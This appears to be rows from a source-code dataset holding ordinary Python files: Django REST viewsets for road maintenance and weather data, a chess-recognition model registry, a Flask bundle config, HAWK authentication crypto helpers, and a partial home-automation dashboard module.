client.run(token) | ja | 0.999595 | #チャンネルID # 接続に必要なオブジェクトを生成 起動時に通知してくれる処理 # ボットの名前 # ボットのID # discord.pyのバージョン # 60秒に一回ループ # 現在の時刻 #ループ処理実行 メッセージを処理 # ボットのメッセージをハネる # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # チャンネルへメッセージを送信 # f文字列(フォーマット済み文字列リテラル) # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # リアクションアイコンを付けたい # for文の内包表記 # Botの起動とDiscordサーバーへの接続 | 2.449804 | 2 |
apps/api/views.py | IT2901-24-2018/orm | 2 | 6614005 | from django.db import connection
from rest_framework import permissions, status, viewsets
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
from vapi.constants import INPUT_LIST_LIMIT, MAX_SEGMENT_LENGTH, MIN_COORDINATES_LENGTH
from api.mapper.mapper import map_to_segment
from api.models import ProductionData, RoadSegment, WeatherData
from api.overlap_handler.overlap_handler import handle_prod_data_overlap
from api.permissions import IsAdminOrReadOnly, IsStaffOrCreateOnly
from api.segmenter.road_segmenter import segment_network
from api.serializers import (ProductionDataInputSerializer, ProductionDataSerializer,
RoadSegmentSerializer, WeatherDataInputSerializer,
WeatherDataSerializer)
from api.weather import weather
class StandardResultsSetPagination(PageNumberPagination):
page_size = 100
page_size_query_param = "page_size"
max_page_size = 1000
class RoadSegmentViewSet(viewsets.ModelViewSet):
"""
This viewset automatically provides "list", "create", "read", "update", "partial_update"
and "destroy" actions.
list: Returns all the elements. Road segments in this case.
read: Retrieve a road segment. #ID of the road segment needed.
update: Update a road segment. All fields are mandatory.
partial_update: Update a road segment. No fields are mandatory.
destroy: Request for deleting a road segment element.
"""
pagination_class = StandardResultsSetPagination
queryset = RoadSegment.objects.all()
serializer_class = RoadSegmentSerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsAdminOrReadOnly,)
def create(self, request, *args, **kwargs):
"""
Inputs a list of road segments.
"""
data = []
# Check if the incoming data is a list
# If it is a list set the many flag to True
if isinstance(request.data, list):
data = request.data
else:
data.append(request.data)
# segment stuff here
segments = segment_network(data, MAX_SEGMENT_LENGTH, MIN_COORDINATES_LENGTH)
# Instantiate the serializer
serializer = self.get_serializer(data=segments, many=True)
# Check if the serializer is valid and takes the necessary actions
if serializer.is_valid():
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED,
headers=headers)
# If not valid return error
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class ProductionDataViewSet(viewsets.ModelViewSet):
"""
This viewset automatically provides "list", "create", "read", "update", "partial_update"
and "destroy" actions.
list: Returns all the elements. Production data in this case.
read: Retrieve production data. #ID of the production needed.
update: Updates one single production data. All fields are mandatory.
partial_update: Updates one single production data. No fields are mandatory.
destroy: Request for deleting a production data element.
"""
queryset = ProductionData.objects.all()
serializer_class = ProductionDataInputSerializer
# Only registered users can use this view
permission_classes = (permissions.IsAuthenticated, IsStaffOrCreateOnly,)
def create(self, request, *args, **kwargs):
"""
Input new production data. The data will be mapped to a road segment defined by set parameters.
"""
data = []
# Check if the incoming data is a list
# If it is a list set the many flag to True
if isinstance(request.data, list):
data = request.data
if len(request.data) > INPUT_LIST_LIMIT:
error = {"detail": "Input list too long"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
else:
data.append(request.data)
serializer = self.get_serializer(data=data, many=True)
if not serializer.is_valid():
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# Map production data to a road segment
mapped_data = map_to_segment(data)
# Check that there are successfully mapped prod-data
if len(mapped_data) == 0:
error = {"detail": "No segments within range"}
return Response(error, status=status.HTTP_200_OK)
# Handle overlap with old prod-data
mapped_data = handle_prod_data_overlap(mapped_data)
# Instantiate the serializer
serializer = ProductionDataSerializer(data=mapped_data, many=True)
# Check if the serializer is valid and takes the necessary actions
if serializer.is_valid():
# Handle weather data when adding new production data
weather.handle_prod_weather_overlap(serializer.validated_data)
serializer.save()
return Response(
"{} row(s) added".format(len(serializer.data)),
status=status.HTTP_201_CREATED,
)
# If not valid return error
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def list(self, request, *args, **kwargs):
queryset = self.get_queryset()
serializer = ProductionDataSerializer(queryset, many=True)
return Response(serializer.data)
class WeatherViewSet(viewsets.ModelViewSet):
"""
list: Returns all the elements. Weather data in this case.
read: Retrieve weather data. #ID of the weather needed.
update: Updates one single weather data. All fields are mandatory.
partial_update: Updates one single weather data. No fields are mandatory.
destroy: Request for deleting a weather data element.
"""
queryset = WeatherData.objects.all()
serializer_class = WeatherDataInputSerializer
# Only registered users can use this view
permission_classes = (permissions.IsAuthenticated, IsStaffOrCreateOnly,)
def list(self, request, *args, **kwargs):
queryset = self.get_queryset()
serializer = WeatherDataSerializer(queryset, many=True)
return Response(serializer.data)
def create(self, request, *args, **kwargs):
"""
Create new weather data from list mapped to road segment
"""
data = []
if isinstance(request.data, list):
data = request.data
if len(request.data) > INPUT_LIST_LIMIT:
error = {"detail": "Input list too long"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
else:
data.append(request.data)
serializer = self.get_serializer(data=data, many=True)
if not serializer.is_valid(raise_exception=True):
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# Map weather data to road a road segment
number_of_updated_weather, mapped_weather = weather.map_weather_to_segment(data)
# Instantiate the serializer
serializer = WeatherDataSerializer(data=mapped_weather, many=True)
# Check if the serializer is valid and takes the necessary actions
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response(
"{} row(s) added and {} weather objects updated".format(len(serializer.data),
number_of_updated_weather),
status=status.HTTP_201_CREATED,
)
# If not valid return error
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class SegmentStatusViewSet(viewsets.ReadOnlyModelViewSet):
"""
Read only viewset for status on segments
"""
pagination_class = StandardResultsSetPagination
page_size = 100
def get_queryset(self):
"""
Django Rest Framework complains if this is not overridden
"""
pass
def get_queryset_custom(self, segment_id=None, page=None, page_size=None):
"""
Custom method for getting the query data
Uses raw sql as the query is a bit difficult to implement with django models
:param segment_id: id of the segment for retrieve
:param page: page number for list
:param page_size: page size for list
:return: When used by retrieve, a dictionary. When used by list, a list of dictionaries
"""
with connection.cursor() as cursor:
stmt = """
SELECT s.id, s.county, s.href, s.category, s.municipality, s.region,
s.status, s.stretchdistance, s.typeofroad, s.roadsectionid, s.vrefshortform,
(SELECT ST_AsText(s.the_geom)) AS the_geom,
w.start_time_period, w.end_time_period,
w.value, w.unit, w.degrees,
(SELECT MAX(p.time) FROM api_productiondata AS p WHERE p.segment_id = s.id) AS time,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.dry_spreader_active = TRUE)) AS dry_spreader_active,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.plow_active = TRUE)) AS plow_active,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.wet_spreader_active = TRUE)) AS wet_spreader_active,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.brush_active = TRUE)) AS brush_active,
(SELECT p.material_type_code
FROM api_productiondata AS p
WHERE p.segment_id = s.id ORDER BY p.material_type_code LIMIT 1) AS material_type_code
FROM api_roadsegment AS s
INNER JOIN api_weatherdata AS w ON s.id = w.segment_id
"""
if segment_id is not None:
where_clause = "WHERE s.id = %s"
cursor.execute(stmt + where_clause, [segment_id])
columns = [col[0] for col in cursor.description]
rows = dict(zip(columns, cursor.fetchone()))
else:
if page is not None and page_size is not None:
pagination = "LIMIT %s OFFSET %s"
cursor.execute(stmt + pagination, [page_size, (int(page) - 1) * int(page_size)])
else:
pagination = "LIMIT %s"
cursor.execute(stmt + pagination, [page_size])
columns = [col[0] for col in cursor.description]
rows = [dict(zip(columns, row)) for row in cursor.fetchall()]
return rows
def list(self, request, *args, **kwargs):
"""
List all segments with status.
Defaults to 100 segments
Use: /api/road-status/?page=<page_number>&page_size<number_of_segments_per_page>
"""
page = request.query_params.get("page", None)
if request.query_params.get("page_size", None) is not None:
page_size = request.query_params.get("page_size", None)
else:
page_size = self.page_size
if page is not None and page_size is not None:
return Response(self.get_queryset_custom(page=page, page_size=page_size))
return Response(self.get_queryset_custom(page_size=self.page_size))
def retrieve(self, request, pk=None, *args, **kwargs):
"""
Retrieve one segment with status from pk
"""
return Response(self.get_queryset_custom(segment_id=pk))
| from django.db import connection
from rest_framework import permissions, status, viewsets
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
from vapi.constants import INPUT_LIST_LIMIT, MAX_SEGMENT_LENGTH, MIN_COORDINATES_LENGTH
from api.mapper.mapper import map_to_segment
from api.models import ProductionData, RoadSegment, WeatherData
from api.overlap_handler.overlap_handler import handle_prod_data_overlap
from api.permissions import IsAdminOrReadOnly, IsStaffOrCreateOnly
from api.segmenter.road_segmenter import segment_network
from api.serializers import (ProductionDataInputSerializer, ProductionDataSerializer,
RoadSegmentSerializer, WeatherDataInputSerializer,
WeatherDataSerializer)
from api.weather import weather
class StandardResultsSetPagination(PageNumberPagination):
page_size = 100
page_size_query_param = "page_size"
max_page_size = 1000
class RoadSegmentViewSet(viewsets.ModelViewSet):
"""
This viewset automatically provides "list", "create", "read", "update", "partial_update"
and "destroy" actions.
list: Returns all the elements. Road segments in this case.
read: Retrieve a road segment. #ID of the road segment needed.
update: Update a road segment. All fields are mandatory.
partial_update: Update a road segment. No fields are mandatory.
destroy: Request for deleting a road segment element.
"""
pagination_class = StandardResultsSetPagination
queryset = RoadSegment.objects.all()
serializer_class = RoadSegmentSerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsAdminOrReadOnly,)
def create(self, request, *args, **kwargs):
"""
Inputs a list of road segments.
"""
data = []
# Check if the incoming data is a list
# If it is a list set the many flag to True
if isinstance(request.data, list):
data = request.data
else:
data.append(request.data)
# segment stuff here
segments = segment_network(data, MAX_SEGMENT_LENGTH, MIN_COORDINATES_LENGTH)
# Instantiate the serializer
serializer = self.get_serializer(data=segments, many=True)
# Check if the serializer is valid and takes the necessary actions
if serializer.is_valid():
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED,
headers=headers)
# If not valid return error
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class ProductionDataViewSet(viewsets.ModelViewSet):
"""
This viewset automatically provides "list", "create", "read", "update", "partial_update"
and "destroy" actions.
list: Returns all the elements. Production data in this case.
read: Retrieve production data. #ID of the production needed.
update: Updates one single production data. All fields are mandatory.
partial_update: Updates one single production data. No fields are mandatory.
destroy: Request for deleting a production data element.
"""
queryset = ProductionData.objects.all()
serializer_class = ProductionDataInputSerializer
# Only registered users can use this view
permission_classes = (permissions.IsAuthenticated, IsStaffOrCreateOnly,)
def create(self, request, *args, **kwargs):
"""
Input new production data. The data will be mapped to a road segment defined by set parameters.
"""
data = []
# Check if the incoming data is a list
# If it is a list set the many flag to True
if isinstance(request.data, list):
data = request.data
if len(request.data) > INPUT_LIST_LIMIT:
error = {"detail": "Input list too long"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
else:
data.append(request.data)
serializer = self.get_serializer(data=data, many=True)
if not serializer.is_valid():
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# Map production data to a road segment
mapped_data = map_to_segment(data)
# Check that there are successfully mapped prod-data
if len(mapped_data) == 0:
error = {"detail": "No segments within range"}
return Response(error, status=status.HTTP_200_OK)
# Handle overlap with old prod-data
mapped_data = handle_prod_data_overlap(mapped_data)
# Instantiate the serializer
serializer = ProductionDataSerializer(data=mapped_data, many=True)
# Check if the serializer is valid and takes the necessary actions
if serializer.is_valid():
# Handle weather data when adding new production data
weather.handle_prod_weather_overlap(serializer.validated_data)
serializer.save()
return Response(
"{} row(s) added".format(len(serializer.data)),
status=status.HTTP_201_CREATED,
)
# If not valid return error
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def list(self, request, *args, **kwargs):
queryset = self.get_queryset()
serializer = ProductionDataSerializer(queryset, many=True)
return Response(serializer.data)
class WeatherViewSet(viewsets.ModelViewSet):
"""
list: Returns all the elements. Weather data in this case.
read: Retrieve weather data. #ID of the weather needed.
update: Updates one single weather data. All fields are mandatory.
partial_update: Updates one single weather data. No fields are mandatory.
destroy: Request for deleting a weather data element.
"""
queryset = WeatherData.objects.all()
serializer_class = WeatherDataInputSerializer
# Only registered users can use this view
permission_classes = (permissions.IsAuthenticated, IsStaffOrCreateOnly,)
def list(self, request, *args, **kwargs):
queryset = self.get_queryset()
serializer = WeatherDataSerializer(queryset, many=True)
return Response(serializer.data)
def create(self, request, *args, **kwargs):
"""
Create new weather data from list mapped to road segment
"""
data = []
if isinstance(request.data, list):
data = request.data
if len(request.data) > INPUT_LIST_LIMIT:
error = {"detail": "Input list too long"}
return Response(error, status=status.HTTP_400_BAD_REQUEST)
else:
data.append(request.data)
serializer = self.get_serializer(data=data, many=True)
if not serializer.is_valid(raise_exception=True):
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# Map weather data to road a road segment
number_of_updated_weather, mapped_weather = weather.map_weather_to_segment(data)
# Instantiate the serializer
serializer = WeatherDataSerializer(data=mapped_weather, many=True)
# Check if the serializer is valid and takes the necessary actions
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response(
"{} row(s) added and {} weather objects updated".format(len(serializer.data),
number_of_updated_weather),
status=status.HTTP_201_CREATED,
)
# If not valid return error
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class SegmentStatusViewSet(viewsets.ReadOnlyModelViewSet):
"""
Read only viewset for status on segments
"""
pagination_class = StandardResultsSetPagination
page_size = 100
def get_queryset(self):
"""
Django Rest Framework complains if this is not overridden
"""
pass
def get_queryset_custom(self, segment_id=None, page=None, page_size=None):
"""
Custom method for getting the query data
Uses raw sql as the query is a bit difficult to implement with django models
:param segment_id: id of the segment for retrieve
:param page: page number for list
:param page_size: page size for list
:return: When used by retrieve, a dictionary. When used by list, a list of dictionaries
"""
with connection.cursor() as cursor:
stmt = """
SELECT s.id, s.county, s.href, s.category, s.municipality, s.region,
s.status, s.stretchdistance, s.typeofroad, s.roadsectionid, s.vrefshortform,
(SELECT ST_AsText(s.the_geom)) AS the_geom,
w.start_time_period, w.end_time_period,
w.value, w.unit, w.degrees,
(SELECT MAX(p.time) FROM api_productiondata AS p WHERE p.segment_id = s.id) AS time,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.dry_spreader_active = TRUE)) AS dry_spreader_active,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.plow_active = TRUE)) AS plow_active,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.wet_spreader_active = TRUE)) AS wet_spreader_active,
(SELECT EXISTS
(SELECT * FROM api_productiondata AS p
WHERE p.segment_id = s.id AND p.brush_active = TRUE)) AS brush_active,
(SELECT p.material_type_code
FROM api_productiondata AS p
WHERE p.segment_id = s.id ORDER BY p.material_type_code LIMIT 1) AS material_type_code
FROM api_roadsegment AS s
INNER JOIN api_weatherdata AS w ON s.id = w.segment_id
"""
if segment_id is not None:
where_clause = "WHERE s.id = %s"
cursor.execute(stmt + where_clause, [segment_id])
columns = [col[0] for col in cursor.description]
rows = dict(zip(columns, cursor.fetchone()))
else:
if page is not None and page_size is not None:
pagination = "LIMIT %s OFFSET %s"
cursor.execute(stmt + pagination, [page_size, (int(page) - 1) * int(page_size)])
else:
pagination = "LIMIT %s"
cursor.execute(stmt + pagination, [page_size])
columns = [col[0] for col in cursor.description]
rows = [dict(zip(columns, row)) for row in cursor.fetchall()]
return rows
def list(self, request, *args, **kwargs):
"""
List all segments with status.
Defaults to 100 segments
Use: /api/road-status/?page=<page_number>&page_size<number_of_segments_per_page>
"""
page = request.query_params.get("page", None)
if request.query_params.get("page_size", None) is not None:
page_size = request.query_params.get("page_size", None)
else:
page_size = self.page_size
if page is not None and page_size is not None:
return Response(self.get_queryset_custom(page=page, page_size=page_size))
return Response(self.get_queryset_custom(page_size=self.page_size))
def retrieve(self, request, pk=None, *args, **kwargs):
"""
Retrieve one segment with status from pk
"""
return Response(self.get_queryset_custom(segment_id=pk))
| en | 0.65753 | This viewset automatically provides "list", "create", "read", "update", "partial_update" and "destroy" actions. list: Returns all the elements. Road segments in this case. read: Retrieve a road segment. #ID of the road segment needed. update: Update a road segment. All fields are mandatory. partial_update: Update a road segment. No fields are mandatory. destroy: Request for deleting a road segment element. Inputs a list of road segments. # Check if the incoming data is a list # If it is a list set the many flag to True # segment stuff here # Instantiate the serializer # Check if the serializer is valid and takes the necessary actions # If not valid return error This viewset automatically provides "list", "create", "read", "update", "partial_update" and "destroy" actions. list: Returns all the elements. Production data in this case. read: Retrieve production data. #ID of the production needed. update: Updates one single production data. All fields are mandatory. partial_update: Updates one single production data. No fields are mandatory. destroy: Request for deleting a production data element. # Only registered users can use this view Input new production data. The data will be mapped to a road segment defined by set parameters. # Check if the incoming data is a list # If it is a list set the many flag to True # Map production data to a road segment # Check that there are successfully mapped prod-data # Handle overlap with old prod-data # Instantiate the serializer # Check if the serializer is valid and takes the necessary actions # Handle weather data when adding new production data # If not valid return error list: Returns all the elements. Weather data in this case. read: Retrieve weather data. #ID of the weather needed. update: Updates one single weather data. All fields are mandatory. partial_update: Updates one single weather data. No fields are mandatory. destroy: Request for deleting a weather data element. # Only registered users can use this view Create new weather data from list mapped to road segment # Map weather data to road a road segment # Instantiate the serializer # Check if the serializer is valid and takes the necessary actions # If not valid return error Read only viewset for status on segments Django Rest Framework complains if this is not overridden Custom method for getting the query data Uses raw sql as the query is a bit difficult to implement with django models :param segment_id: id of the segment for retrieve :param page: page number for list :param page_size: page size for list :return: When used by retrieve, a dictionary. When used by list, a list of dictionaries SELECT s.id, s.county, s.href, s.category, s.municipality, s.region, s.status, s.stretchdistance, s.typeofroad, s.roadsectionid, s.vrefshortform, (SELECT ST_AsText(s.the_geom)) AS the_geom, w.start_time_period, w.end_time_period, w.value, w.unit, w.degrees, (SELECT MAX(p.time) FROM api_productiondata AS p WHERE p.segment_id = s.id) AS time, (SELECT EXISTS (SELECT * FROM api_productiondata AS p WHERE p.segment_id = s.id AND p.dry_spreader_active = TRUE)) AS dry_spreader_active, (SELECT EXISTS (SELECT * FROM api_productiondata AS p WHERE p.segment_id = s.id AND p.plow_active = TRUE)) AS plow_active, (SELECT EXISTS (SELECT * FROM api_productiondata AS p WHERE p.segment_id = s.id AND p.wet_spreader_active = TRUE)) AS wet_spreader_active, (SELECT EXISTS (SELECT * FROM api_productiondata AS p WHERE p.segment_id = s.id AND p.brush_active = TRUE)) AS brush_active, (SELECT p.material_type_code FROM api_productiondata AS p WHERE p.segment_id = s.id ORDER BY p.material_type_code LIMIT 1) AS material_type_code FROM api_roadsegment AS s INNER JOIN api_weatherdata AS w ON s.id = w.segment_id List all segments with status. Defaults to 100 segments Use: /api/road-status/?page=<page_number>&page_size<number_of_segments_per_page> Retrieve one segment with status from pk | 2.206608 | 2 |
chesscog/core/models.py | MarinusHeindl/chesscog | 12 | 6614006 | """Common tasks related to models.
"""
from torch import nn
from recap import CfgNode as CN
from chesscog.core.registry import Registry
#: The global models registry
MODELS_REGISTRY = Registry()
def build_model(cfg: CN) -> nn.Module:
"""Build a CNN from a configuration.
Args:
cfg (CN): the configuration
Returns:
nn.Module: the built CNN model
"""
model = cfg.TRAINING.MODEL
return MODELS_REGISTRY[model.REGISTRY][model.NAME]()
| """Common tasks related to models.
"""
from torch import nn
from recap import CfgNode as CN
from chesscog.core.registry import Registry
#: The global models registry
MODELS_REGISTRY = Registry()
def build_model(cfg: CN) -> nn.Module:
"""Build a CNN from a configuration.
Args:
cfg (CN): the configuration
Returns:
nn.Module: the built CNN model
"""
model = cfg.TRAINING.MODEL
return MODELS_REGISTRY[model.REGISTRY][model.NAME]()
| en | 0.707706 | Common tasks related to models. #: The global models registry Build a CNN from a configuration. Args: cfg (CN): the configuration Returns: nn.Module: the built CNN model | 2.400745 | 2 |
unchained_config.py | codebyravi/flask-unchained-react-spa | 5 | 6614007 | BUNDLES = [
'flask_unchained.bundles.admin',
'flask_unchained.bundles.api',
'flask_unchained.bundles.mail',
'flask_unchained.bundles.celery', # must be after mail bundle to send async email
'flask_unchained.bundles.session',
'flask_unchained.bundles.sqlalchemy',
'py_yaml_fixtures',
'bundles.blog',
'bundles.security',
'backend', # app bundle must be last
]
| BUNDLES = [
'flask_unchained.bundles.admin',
'flask_unchained.bundles.api',
'flask_unchained.bundles.mail',
'flask_unchained.bundles.celery', # must be after mail bundle to send async email
'flask_unchained.bundles.session',
'flask_unchained.bundles.sqlalchemy',
'py_yaml_fixtures',
'bundles.blog',
'bundles.security',
'backend', # app bundle must be last
]
| en | 0.858478 | # must be after mail bundle to send async email # app bundle must be last | 1.076521 | 1 |
hawk/hcrypto.py | ludwigkraatz/PyHawk | 0 | 6614008 | # -*- coding: utf-8 -*-
"""
Crypto functions for HAWK authentication
"""
from base64 import b64encode, urlsafe_b64encode, urlsafe_b64decode
import hashlib
import hmac
import random
import string
from hawk.util import HawkException
HAWK_VER = 1
class UnknownAlgorithm(HawkException):
"""Exception raised for bad configuration of algorithm."""
pass
class InvalidBewit(HawkException):
"""Exception raised for invalid bewit value."""
pass
def calculate_mac(mac_type, credentials, options, url_encode=False):
"""Calculates a message authentication code (MAC)."""
normalized = normalize_string(mac_type, options)
digestmod = module_for_algorithm(credentials['algorithm'])
result = hmac.new(credentials['key'], normalized, digestmod)
if url_encode:
mac = urlsafe_b64encode(result.digest())
else:
mac = b64encode(result.digest())
return mac
def module_for_algorithm(algorithm):
"""Returns a hashlib algorithm based on given string."""
if 'sha256' == algorithm:
return hashlib.sha256
else:
raise UnknownAlgorithm
def normalize_string(mac_type, options):
"""Serializes mac_type and options into a HAWK string."""
# TODO this smells
if 'hash' not in options or options['hash'] is None:
options['hash'] = ''
normalized = '\n'.join(
['hawk.' + str(HAWK_VER) + '.' + mac_type,
str(options['ts']),
options['nonce'],
options['method'].upper(),
options['resource'],
options['host'].lower(),
str(options['port']),
options['hash']])
normalized += '\n'
if 'ext' in options and len(options['ext']) > 0:
n_ext = options['ext'].replace('\\', '\\\\').replace('\n', '\\n')
normalized += n_ext
normalized += '\n'
if 'app' in options and options['app'] is not None and \
len(options['app']) > 0:
normalized += options['app'] + '\n'
if 'dlg' in options and len(options['dlg']) > 0:
normalized += options['dlg'] + '\n'
return normalized
def calculate_payload_hash(payload, algorithm, content_type):
"""Calculates a hash for a given payload."""
p_hash = hashlib.new(algorithm)
p_hash.update('hawk.' + str(HAWK_VER) + '.payload\n')
p_hash.update(parse_content_type(content_type) + '\n')
if payload:
p_hash.update(payload)
else:
p_hash.update('')
p_hash.update('\n')
return b64encode(p_hash.digest())
def parse_content_type(content_type):
"""Cleans up content_type."""
if content_type:
return content_type.split(';')[0].strip().lower()
else:
return ''
def calculate_ts_mac(ts, credentials):
"""Calculates a timestamp message authentication code for HAWK."""
data = 'hawk.' + str(HAWK_VER) + '.ts\n' + ts + '\n'
digestmod = module_for_algorithm(credentials['algorithm'])
result = hmac.new(credentials['key'], data, digestmod)
return b64encode(result.digest())
def random_string(length):
"""Generates a random string for a given length."""
return ''.join(random.choice(string.lowercase) for i in range(length))
def calculate_bewit(credentials, artifacts, exp):
"""Calculates mac and formats a string for the bewit."""
mac = calculate_mac('bewit', credentials, artifacts, True)
# Construct bewit: id\exp\mac\ext
bewit = '\\'.join([credentials['id'], str(int(exp)), mac, artifacts['ext']])
return urlsafe_b64encode(bewit)
def explode_bewit(bewit):
"""Decodes a bewit and returns a dict of the parts.
keys include: id, exp - expiration timestamp as integer, mac, ext
"""
clear_b = urlsafe_b64decode(bewit)
parts = clear_b.split('\\')
if 4 != len(parts):
print "Wrong number of bewit parts"
raise InvalidBewit
return {
'id': parts[0],
'exp': int(parts[1]),
'mac': parts[2],
'ext': parts[3]
}
| # -*- coding: utf-8 -*-
"""
Crypto functions for HAWK authentication
"""
from base64 import b64encode, urlsafe_b64encode, urlsafe_b64decode
import hashlib
import hmac
import random
import string
from hawk.util import HawkException
HAWK_VER = 1
class UnknownAlgorithm(HawkException):
"""Exception raised for bad configuration of algorithm."""
pass
class InvalidBewit(HawkException):
"""Exception raised for invalid bewit value."""
pass
def calculate_mac(mac_type, credentials, options, url_encode=False):
"""Calculates a message authentication code (MAC)."""
normalized = normalize_string(mac_type, options)
digestmod = module_for_algorithm(credentials['algorithm'])
result = hmac.new(credentials['key'], normalized, digestmod)
if url_encode:
mac = urlsafe_b64encode(result.digest())
else:
mac = b64encode(result.digest())
return mac
def module_for_algorithm(algorithm):
"""Returns a hashlib algorithm based on given string."""
if 'sha256' == algorithm:
return hashlib.sha256
else:
raise UnknownAlgorithm
def normalize_string(mac_type, options):
"""Serializes mac_type and options into a HAWK string."""
# TODO this smells
if 'hash' not in options or options['hash'] is None:
options['hash'] = ''
normalized = '\n'.join(
['hawk.' + str(HAWK_VER) + '.' + mac_type,
str(options['ts']),
options['nonce'],
options['method'].upper(),
options['resource'],
options['host'].lower(),
str(options['port']),
options['hash']])
normalized += '\n'
if 'ext' in options and len(options['ext']) > 0:
n_ext = options['ext'].replace('\\', '\\\\').replace('\n', '\\n')
normalized += n_ext
normalized += '\n'
if 'app' in options and options['app'] is not None and \
len(options['app']) > 0:
normalized += options['app'] + '\n'
if 'dlg' in options and len(options['dlg']) > 0:
normalized += options['dlg'] + '\n'
return normalized
def calculate_payload_hash(payload, algorithm, content_type):
"""Calculates a hash for a given payload."""
p_hash = hashlib.new(algorithm)
p_hash.update('hawk.' + str(HAWK_VER) + '.payload\n')
p_hash.update(parse_content_type(content_type) + '\n')
if payload:
p_hash.update(payload)
else:
p_hash.update('')
p_hash.update('\n')
return b64encode(p_hash.digest())
def parse_content_type(content_type):
"""Cleans up content_type."""
if content_type:
return content_type.split(';')[0].strip().lower()
else:
return ''
def calculate_ts_mac(ts, credentials):
"""Calculates a timestamp message authentication code for HAWK."""
data = 'hawk.' + str(HAWK_VER) + '.ts\n' + ts + '\n'
digestmod = module_for_algorithm(credentials['algorithm'])
result = hmac.new(credentials['key'], data, digestmod)
return b64encode(result.digest())
def random_string(length):
"""Generates a random string for a given length."""
return ''.join(random.choice(string.lowercase) for i in range(length))
def calculate_bewit(credentials, artifacts, exp):
"""Calculates mac and formats a string for the bewit."""
mac = calculate_mac('bewit', credentials, artifacts, True)
# Construct bewit: id\exp\mac\ext
bewit = '\\'.join([credentials['id'], str(int(exp)), mac, artifacts['ext']])
return urlsafe_b64encode(bewit)
def explode_bewit(bewit):
"""Decodes a bewit and returns a dict of the parts.
keys include: id, exp - expiration timestamp as integer, mac, ext
"""
clear_b = urlsafe_b64decode(bewit)
parts = clear_b.split('\\')
if 4 != len(parts):
print "Wrong number of bewit parts"
raise InvalidBewit
return {
'id': parts[0],
'exp': int(parts[1]),
'mac': parts[2],
'ext': parts[3]
}
| en | 0.639147 | # -*- coding: utf-8 -*- Crypto functions for HAWK authentication Exception raised for bad configuration of algorithm. Exception raised for invalid bewit value. Calculates a message authentication code (MAC). Returns a hashlib algorithm based on given string. Serializes mac_type and options into a HAWK string. # TODO this smells Calculates a hash for a given payload. Cleans up content_type. Calculates a timestamp message authentication code for HAWK. Generates a random string for a given length. Calculates mac and formats a string for the bewit. # Construct bewit: id\exp\mac\ext Decodes a bewit and returns a dict of the parts. keys include: id, exp - expiration timestamp as integer, mac, ext | 2.973562 | 3 |
homecontrol/modules/dashboard/module.py | lennart-k/HomeControl | 7 | 6614009 | <filename>homecontrol/modules/dashboard/module.py
"""The dashboard module"""
from typing import TYPE_CHECKING, Any, Dict, List, cast
import voluptuous as vol
from attr import attrib, attrs
from homecontrol.const import EVENT_CORE_BOOTSTRAP_COMPLETE
from homecontrol.dependencies.entity_types import ModuleDef
from homecontrol.dependencies.linter_friendly_attrs import LinterFriendlyAttrs
from .commands import add_commands
if TYPE_CHECKING:
from homecontrol.modules.websocket.module import Module as WebSocketModule
SPEC = {
"name": "Dashboard",
"description": "Provides the Frontend's dashboards"
}
DASHBOARD_SCHEMA = vol.Schema({
vol.Required("identifier"): str,
vol.Required("sections", default=list): list,
vol.Optional("name"): str,
vol.Optional("icon"): str
}, extra=vol.ALLOW_EXTRA)
CONFIG_SCHEMA = vol.Schema([DASHBOARD_SCHEMA])
@attrs(slots=True)
class Dashboard(LinterFriendlyAttrs):
"""A dashboard"""
identifier: str = attrib()
provider: str = attrib()
name: str = attrib(default=None)
icon: str = attrib(default="")
sections: list = attrib(default=[])
def __attrs_post_init__(self) -> None:
self.name = self.name or self.identifier
class Module(ModuleDef):
"""Provides dashboard configuration for frontend"""
dashboards: Dict[str, Dashboard]
async def init(self) -> None:
self.dashboards = {}
await self.load_yaml_config()
